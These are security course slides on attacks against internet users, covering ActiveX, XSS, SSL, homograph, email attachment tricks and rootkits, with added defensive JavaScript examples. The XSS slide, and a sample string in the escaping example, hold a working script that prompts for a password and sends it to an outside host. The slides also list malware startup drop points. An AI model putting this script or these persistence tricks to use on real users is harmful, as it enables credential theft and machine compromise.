Chapter 12
Hacking the Internet User
Last modified 5-8-09
Internet Client Vulnerabilities
Microsoft ActiveX
• ActiveX applications, or controls, can be written to perform specific functions (such as displaying a movie or sound file)
• They can be embedded in a web page to provide this functionality
• ActiveX controls typically have the file extension .ocx
• They are embedded within web pages using the <OBJECT> tag
Microsoft ActiveX
• Controls are downloaded to the location specified by the Registry string value
– HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ActiveXCache
• The default location on Windows XP and Vista is %systemroot%\Downloaded Program Files
– Usually C:\Windows\Downloaded Program Files
ActiveX Controls on a Vista Machine
The ActiveX Security Model: Authenticode
• ActiveX controls can do almost anything
• But they can be signed with a digital signature (Authenticode), so you know who to blame
• Exploder was a signed control that shut down Win 95 machines
– Microsoft and Verisign revoked its Authenticode software publisher certificate
– Link Ch 13_01
"Safe for Scripting" Vulnerability
• scriptlet.typelib and Eyedog.ocx
– ActiveX controls shipped with IE 4 and earlier
– Marked "Safe for scripting"
– Enabled to run without a warning, bypassing Authenticode
"Safe for Scripting" Vulnerability
• "Safe for Scripting" controls can be abused by malicious Web pages to execute arbitrary code
– This exploit was demonstrated in 1999
  Link Ch 13_02
– But later examples of "Safe for Scripting" exploits exist
  From 2005, as part of the Sony Rootkit
– Link Ch 13_03
• A nice tutorial from 2008 (link Ch 13_26)
ActiveX Abuse Countermeasures
• IE Users:
– Restrict or disable ActiveX with Internet Explorer security zones
  In IE, Tools, Internet Options, Security tab
• Developers:
– Don't write safe-for-scripting controls that could perform dangerous acts, like file access
ActiveX Abuse Countermeasures
• Developers:
– Use SiteLock to restrict access so that the control is only deemed safe in a predetermined list of domains
  Link Ch 13_05
– Disable unwanted ActiveX controls with the Kill Bit
  Link Ch 13_06
Java
• Java runs in a "sandbox" using the Java Virtual Machine, which makes it much safer than ActiveX
• But flaws that allow code to escape the sandbox have been discovered
– Type confusion attack in 1999
– Brown Orifice in 2000 (link Ch 13_07)
– Java Virtual Machine remote compromise by heap overflow in 2005 (link Ch 13_08)
Java Abuse Countermeasures
• Restrict Java through the use of Microsoft Internet Explorer security zones
• Keep your Java platform updated
JavaScript and Active Scripting
• JavaScript was created by Netscape in the mid-1990s
– It has nothing to do with Sun's Java
• Microsoft platforms execute JavaScript and other client-side scripting languages (such as Microsoft's own VBScript) using a Component Object Model (COM)-based technology called Active Scripting
• JavaScript is powerful and easy to use, and often used for malicious purposes, such as pop-up ads
JavaScript/Active Scripting Abuse Countermeasures
• Use Internet Explorer security zones
• Use the "NoScript" Firefox extension
Cookies
• Cookies allow websites to remember who you are from visit to visit
• Sniffing cookies can reveal data, or allow you to "sidejack" authenticated sessions
Cookie Abuse Countermeasures
• In IE, you can control cookie handling in Internet Options on the Privacy tab
• Use SSL when possible
– https://mail.google.com, not gmail.com
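Added example, not from the slides: a small audit of Set-Cookie headers from the server side of the same problem. A session cookie that is sniffed or sidejacked is one the browser was willing to send over plain HTTP; the Secure attribute tells the browser to send it only over SSL/TLS, which is what "use SSL when possible" buys you. The HttpOnly attribute (not on the slide, included as an assumption about good practice) keeps page scripts from reading the cookie. parseSetCookie, auditSessionCookie and the two sample headers are constructed for this example.

```javascript
// Parse one Set-Cookie header value into its name, value and attribute map.
// Attribute names are lower-cased; flag attributes (Secure, HttpOnly) map to true.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const [name, ...valueParts] = parts[0].split('=');
  const attrs = {};
  for (const part of parts.slice(1)) {
    const eq = part.indexOf('=');
    const key = (eq === -1 ? part : part.slice(0, eq)).trim().toLowerCase();
    attrs[key] = eq === -1 ? true : part.slice(eq + 1).trim();
  }
  return { name: name.trim(), value: valueParts.join('='), attrs };
}

// Return the problems found with a cookie that carries a session identifier.
// An empty findings list means the cookie cannot be sniffed off plain HTTP
// and cannot be read by an injected script.
function auditSessionCookie(header) {
  const cookie = parseSetCookie(header);
  const findings = [];
  if (!cookie.attrs.secure) {
    findings.push('missing Secure: cookie is sent over plain HTTP and can be sniffed');
  }
  if (!cookie.attrs.httponly) {
    findings.push('missing HttpOnly: page scripts can read the cookie');
  }
  return { name: cookie.name, findings };
}

// Constructed sample headers: the weak setting beside the corrected one.
const WEAK_HEADER = 'SID=abc123; Path=/; Domain=.example.com';
const FIXED_HEADER = 'SID=abc123; Path=/; Domain=.example.com; Secure; HttpOnly';

// Usage: print the audit of both samples.
for (const h of [WEAK_HEADER, FIXED_HEADER]) {
  console.log(auditSessionCookie(h));
}
```

The audit reads one header at a time; in a real review you would run it over every Set-Cookie header in a captured response, and only the cookies that hold a session need both attributes.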
Cross-Site Scripting (XSS)
• This script will harvest passwords from unwary users
– <SCRIPT Language="Javascript">var password=prompt('Your session has expired. Please enter your password to continue.',''); location.href="http://samsclass.info?passwd="+password;</SCRIPT>
• Demo at http://fog.ccsf.edu/~sbowne/feedback-vulnerable.html
• Many other attacks are possible, such as stealing cookies
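Added example, not from the slides or the demo page: the server-side rendering of a feedback form, shown the vulnerable way and the fixed way. The unsafe version pastes a visitor's comment straight into the page, so the prompt()-based script quoted above runs in every later visitor's browser. The safe version encodes the five characters HTML treats specially, so the same text is displayed but never executed. escapeHtml, the two renderFeedback functions and the sample payload are constructed for this example.

```javascript
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Encode text for safe insertion into element content or a quoted attribute.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// The vulnerable 'before': untrusted input concatenated into markup.
function renderFeedbackUnsafe(comment) {
  return '<div class="comment">' + comment + '</div>';
}

// The hardened 'after': the same markup with the input encoded first.
function renderFeedbackSafe(comment) {
  return '<div class="comment">' + escapeHtml(comment) + '</div>';
}

// Does the rendered HTML still contain a live script element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample input: the password-harvesting script quoted on the slide.
const SAMPLE_PAYLOAD =
  '<SCRIPT Language="Javascript">var password=prompt(' +
  "'Your session has expired. Please enter your password to continue.',''); " +
  'location.href="http://samsclass.info?passwd="+password;</SCRIPT>';

// Usage: compare the two renderings of the same comment.
console.log('unsafe executes:', containsScriptTag(renderFeedbackUnsafe(SAMPLE_PAYLOAD)));
console.log('safe executes:  ', containsScriptTag(renderFeedbackSafe(SAMPLE_PAYLOAD)));
console.log(renderFeedbackSafe(SAMPLE_PAYLOAD));
```

Encoding at output time is the fix for the feedback page; the same escape is needed anywhere user text lands in HTML, and text that lands inside a script block or a URL needs the encoding appropriate to that context instead.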
Cross-Frame/Domain Vulnerabilities
• Like XSS, but operating on the client
– Tricking your browser into executing code from one frame in a different frame
• IE has access to the local file system, calling it the Local Machine Zone (LMZ)
– A common target for attacks
– There are a lot of Cross-Frame attacks at link Ch 13_09
Cross-Frame/Domain Vulnerabilities
• The IFRAME Tag
– IFrames add a frame from another site in the middle of a Web page
– Used in many attacks
  Link Ch 13_10 from 2008
• HTML Help ActiveX Control
– Runs in the LMZ zone
– A popular target for exploits
SSL Attacks
• When it works, SSL ensures that a server is genuine, and warns the client if a man-in-the-middle (MITM) attack is in progress
• Netscape failed to re-check later connections to the same IP address
– From the year 2000, link Ch 13_10
• Firefox fails to properly check for revoked certificates
– From 2009, link Ch_13_27
SSL Vulnerabilities in IE
• IE failed to check server names and expiration dates on certificates
• Failed to revalidate certificates on reconnection to the same server
• Errors in SSL Certificate Revocation List (CRL)-checking routines
– See links Ch 13_11, 13_12
Homograph Attacks
• Using non-English language characters, it was possible to buy a domain name that looked like paypal.com but wasn't
• This has been patched in the latest browser versions
– Link Ch_13_13
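Added example, not from the slides: a lookalike check of the kind a proxy log review or a link filter can apply. A homograph domain swaps Latin letters for visually identical letters from another script (Cyrillic "а" for Latin "a", and so on). Mapping each confusable back to its Latin twin gives a "skeleton" of what the reader perceives; if a hostname's skeleton matches a brand you protect but the hostname itself does not, it is a lookalike. The confusable table is a small hand-picked subset, and skeleton, classifyHost and the sample hostname are constructed for this example.

```javascript
// Cyrillic letters that render like Latin ones in most fonts.
// Assumption: a small hand-picked subset, not the full Unicode confusables list.
const CONFUSABLES = new Map([
  ['\u0430', 'a'], // Cyrillic a
  ['\u0435', 'e'], // Cyrillic ie
  ['\u043E', 'o'], // Cyrillic o
  ['\u0440', 'p'], // Cyrillic er
  ['\u0441', 'c'], // Cyrillic es
  ['\u0443', 'y'], // Cyrillic u
  ['\u0445', 'x'], // Cyrillic ha
  ['\u0456', 'i'], // Cyrillic byelorussian-ukrainian i
  ['\u0458', 'j'], // Cyrillic je
  ['\u04BB', 'h'], // Cyrillic shha
]);

// Reduce a hostname to the ASCII string a reader would perceive.
function skeleton(hostname) {
  let out = '';
  for (const ch of hostname.normalize('NFC').toLowerCase()) {
    out += CONFUSABLES.get(ch) || ch;
  }
  return out;
}

// True if the hostname contains any character outside printable ASCII,
// which is never the case for the real brand domains on the protected list.
function hasNonAscii(hostname) {
  return /[^\x21-\x7E]/.test(hostname);
}

// Classify a hostname against the brand domains we protect.
// Returns 'exact', 'lookalike' or 'unrelated'.
function classifyHost(hostname, protectedHosts) {
  const lower = hostname.normalize('NFC').toLowerCase();
  if (protectedHosts.includes(lower)) return 'exact';
  if (protectedHosts.includes(skeleton(lower))) return 'lookalike';
  return 'unrelated';
}

// Constructed samples: the real domain from the slide and a lookalike whose
// first 'a' is the Cyrillic letter U+0430.
const PROTECTED = ['paypal.com'];
const LOOKALIKE = 'p\u0430ypal.com';

// Usage: classify a few hostnames.
for (const h of ['paypal.com', LOOKALIKE, 'example.org']) {
  console.log(h, hasNonAscii(h) ? '(non-ASCII)' : '', '->', classifyHost(h, PROTECTED));
}
```

Browsers address the same problem by showing such names in their encoded "xn--" form; the skeleton check is the equivalent for logs and mail filters, where no browser is in the loop.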
SSL Attack Countermeasures
• Keep your Internet client software fully updated and patched
• Check certificates manually
Payloads and Drop Points
• Places to put code to make it launch at startup
– Microsoft Excel .xla file or compiled HTML help file (.chm) into a user's Windows startup folder
– Run keys in the Windows Registry
– Using the showHelp() method and Microsoft's HTML Help hh.exe to launch .chm and .htm files directly from exploits
– Dropping malicious links into the IE startup page Registry values
Auto-Start Extensibility Points (ASEPs)
• Link Ch 13_15
• Windows Defender
• Msconfig
E-mail Hacking
• File Attachments
– Windows scrap files can be used to execute code
– File extensions can be hidden with spaces
  freemp3.doc . . . [150 spaces] . . . .exe
– IFrames can be used to execute an attached file within an HTML-enabled email
– Just trick the user into opening the attachment with social engineering, as MyDoom did in 2004 (link Ch 13_16)
Error message about attachment
Multi-part Internet Mail Extensions (MIME)
• In 2000, executable file types were automatically executed within IE or HTML e-mail messages if they were mislabeled as the incorrect MIME type
• The Nimda Worm exploited this vulnerability
– Although the patch was available, it had not been implemented widely enough
– Link Ch 13_17
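Added example, not from the slides: screening an attachment the way a mail gateway would, covering both tricks from the preceding two slides: an executable extension hidden behind a run of spaces (freemp3.doc ... .exe) and an executable mislabeled with a harmless MIME type. The list of executable extensions, the "MZ" magic check, and screenAttachment with its sample inputs are constructed for this example (.shs is the Windows scrap-file extension; the slide names scrap files but not the extension).

```javascript
// Extensions Windows will execute when opened.
// Assumption: a short list of common executable types, not an exhaustive one.
const EXECUTABLE_EXTENSIONS = new Set([
  'exe', 'com', 'scr', 'pif', 'bat', 'cmd', 'shs', 'shb', 'vbs', 'js', 'hta',
]);

// MIME types a gateway would consider passive content (constructed list).
const PASSIVE_MIME = new Set(['audio/mpeg', 'image/jpeg', 'text/plain', 'application/msword']);

// Every extension a filename carries, with padding whitespace stripped,
// so 'freemp3.doc<150 spaces>.exe' yields ['doc', 'exe'].
function extensionsOf(filename) {
  return filename
    .split('.')
    .slice(1)
    .map((part) => part.trim().toLowerCase())
    .filter((part) => part.length > 0);
}

// True if whitespace sits between the visible name and the final extension.
function hasPaddedExtension(filename) {
  return filename.split('.').slice(1).some((part) => part !== part.trim());
}

// Detect a Windows PE executable by its 'MZ' signature in the first two bytes.
function looksLikePE(bytes) {
  return bytes.length >= 2 && bytes[0] === 0x4d && bytes[1] === 0x5a;
}

// Return the reasons to block an attachment; an empty list means it passed.
function screenAttachment({ filename, contentType, bytes }) {
  const reasons = [];
  const exts = extensionsOf(filename);
  const last = exts[exts.length - 1];
  if (last && EXECUTABLE_EXTENSIONS.has(last)) {
    reasons.push('executable extension .' + last);
    if (exts.length > 1) reasons.push('double extension');
    if (hasPaddedExtension(filename)) reasons.push('whitespace padding hides the real extension');
  }
  if (looksLikePE(bytes) && PASSIVE_MIME.has(contentType.toLowerCase())) {
    reasons.push('content is a PE executable but labeled ' + contentType);
  }
  return reasons;
}

// Constructed samples: a padded double extension, a mislabeled executable, a clean file.
const PADDED_NAME = 'freemp3.doc' + ' '.repeat(150) + '.exe';
const PE_BYTES = new Uint8Array([0x4d, 0x5a, 0x90, 0x00]);
const PADDED = { filename: PADDED_NAME, contentType: 'application/msword', bytes: PE_BYTES };
const MISLABELED = { filename: 'song.mp3', contentType: 'audio/mpeg', bytes: PE_BYTES };
const CLEAN = { filename: 'notes.txt', contentType: 'text/plain', bytes: new TextEncoder().encode('plain text') };

// Usage: screen each sample.
for (const a of [PADDED, MISLABELED, CLEAN]) {
  console.log(a.filename.trim(), '->', screenAttachment(a));
}
```

The point of checking the bytes as well as the name and the declared type is that the Nimda-era bug was precisely the client trusting the label; a gateway that looks at content does not inherit that trust.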
E-mail Hacking Countermeasures
• Patch the vulnerabilities
• Disable rendering of HTML mail altogether
• Block ActiveX and JavaScript in Email
– Microsoft Outlook and Outlook Express now set the Restricted Sites zone for reading e-mail by default
• Don't open attachments you don't expect
Instant Messaging (IM)
• Tricks users into clicking on links or accepting file transfers
• May also exploit IM software vulnerabilities
– Link Ch 13_18
Microsoft Internet Client Exploits
• GDI+ JPEG Processing Buffer Overflow (IE6 SP1)
– Allowed remote control on any machine that renders a malicious JPEG (Link Ch 13_19)
• Countermeasures
– Firewall that filters outgoing traffic might block the remote control
– Updated antivirus software
– Updates and patches
– Read email in text-only format
– Run as a Limited user, not an Administrator
IE Improper URL Canonicalization
• IE failed to properly display in its address bar any URLs of the format
– user@domain
when a nonprinting character (%01, or 1 in hexadecimal) was placed before the "@" character
• IE 7 & Firefox now warn you of this
• IE8 seems to block it
– Link Ch 13_22
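Added example, not from the slides: what a browser actually connects to for a URL of the user@domain form. A standards-conforming parser (Node's built-in WHATWG URL class is used here) treats everything before the "@" as credentials, so the host is whatever follows it, no matter what the text before it resembles. describeUrl is constructed for this example; it reports the real host and flags the two things that made the IE bug dangerous, userinfo in a link and a nonprinting character such as %01.

```javascript
// Summarize where a link really goes and why its text might deceive a reader.
function describeUrl(raw) {
  const url = new URL(raw);
  const warnings = [];
  if (url.username !== '' || url.password !== '') {
    warnings.push('URL carries userinfo before "@"; the text before "@" is not the host');
  }
  // %00-%1F encoded, or a raw control character, has no business in a link.
  if (/%[01][0-9a-f]/i.test(raw) || /[\x00-\x1f]/.test(raw)) {
    warnings.push('URL contains a nonprinting character');
  }
  return { host: url.hostname, userinfo: url.username, warnings };
}

// Constructed samples: a deceptive link and a plain one to the same site name.
const DECEPTIVE = 'http://www.bank.example%01@attacker.example/login';
const PLAIN = 'http://www.bank.example/login';

// Usage: show the real destination of each link.
for (const link of [DECEPTIVE, PLAIN]) {
  console.log(link, '->', describeUrl(link));
}
```

In a mail filter or a proxy log, the useful output is the host field: a link whose visible text names one site while describeUrl reports another is the pattern to alert on.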
Web Application Firewall
• Prevents canonicalization attacks, SQL Injection, etc.
• Links Ch_13_28, Ch_13_29
IE HTML Help Control Local Execution
• Opens a Microsoft help page on the C: drive, in the Local Machine Zone (LMZ)
• The exploit code then opens a second window, which injects executable JavaScript into the LMZ window
– Can install software on the local machine
General Microsoft Client-Side Countermeasures
• Use a firewall that can filter outgoing connections
• Keep up-to-date on patches
• Use antivirus software
• Use IE Security Zones wisely
• Run with least privilege, not as Administrator
• Read email in plaintext
General Microsoft Client-Side Countermeasures
• Administrators of large networks should deploy firewalls at key points and use Group Policy to enforce security measures
General Microsoft Client-Side Countermeasures
• Configure office productivity programs as securely as possible
– Set the Microsoft Office programs to "Very High" macro security under Tools | Macro | Security
• Don't be gullible. Approach Internet-borne solicitations and transactions with high skepticism
• Keep your computing devices physically secure
Skip pages 611-624
Rootkits and Back Doors
DKOM (Direct Kernel Object Manipulation)
From a Powerpoint written by Jamie Butler
Link Ch 13_25
Operating System Design
• User Land
– Operating system provides common API for developers to use
  Kernel32.dll
  Ntdll.dll
• Kernel Mode
– The low level kernel functions that implement the services needed in user land
– Protected memory containing objects such as those for processes, tokens, ports, etc.
Operating System Design
• Intel has four privilege levels or rings
• Microsoft and many other OS vendors use only two rings
Operating System Design
• By only using two privilege levels, there is no separation between the kernel itself and third party drivers or loadable kernel modules (LKMs)
• Drivers can modify the memory associated with kernel objects such as those that represent a process's token
Consumers demand more…
• Corporations and many private consumers see the need for more security
– Personal firewalls
– Host based intrusion detection systems (HIDS)
– Host based intrusion prevention systems (HIPS)
Current HIDS/HIPS Functions
• To detect or prevent:
– Processes running
– Files that are created/deleted/modified
– Network connections made
– Privilege escalation
• Trusts the operating system to report these activities.
• If the underlying operating system is compromised, the HIDS/HIPS fails.
What Makes HIDS/HIPS Possible?
• Querying kernel reporting functions
• Hooking user land API functions
– Kernel32.dll
– Ntdll.dll
• Hooking the System Call Table
• Registering OS provided call-back functions
Attack Scenario
• Attacker gains elevated access to computer system
• Attacker installs a Rootkit
• Rootkit's functions
– Hide processes
– Hide files
– Hide network connections
– Install a backdoor for future access to the system
• Rootkits act as a part of the operating system so they have access to kernel memory.
State of Current Rootkits
• Until recently, rootkits were nothing more than Trojan programs such as ps, ls, top, du, and netstat
• Advanced rootkits filter data
– Hook the System Call Table of the operating system (the functions exported by the kernel)
– Hook the Interrupt Descriptor Table (IDT)
  Interrupts are used to signal to the kernel that it has work to perform.
  By hooking one interrupt, a clever rootkit can filter all exported kernel functions.
Demonstration: Hacker Defender Rootkit
• Hides files, processes, network connections, and more
• Works on Win XP SP2
• Damages the OS
– Use a VM and discard it when done!
Other Common Rootkits
• FU - consists of two components: a user-mode dropper (fu.exe) and a kernel-mode driver (msdirectx.sys)
• Vanquish - a DLL injection-based Romanian rootkit
• AFX Rootkit by Aphex is composed of two files, iexplore.dll and explorer.dll, which it names "iexplore.exe" and "explorer.exe" and copies to the system folder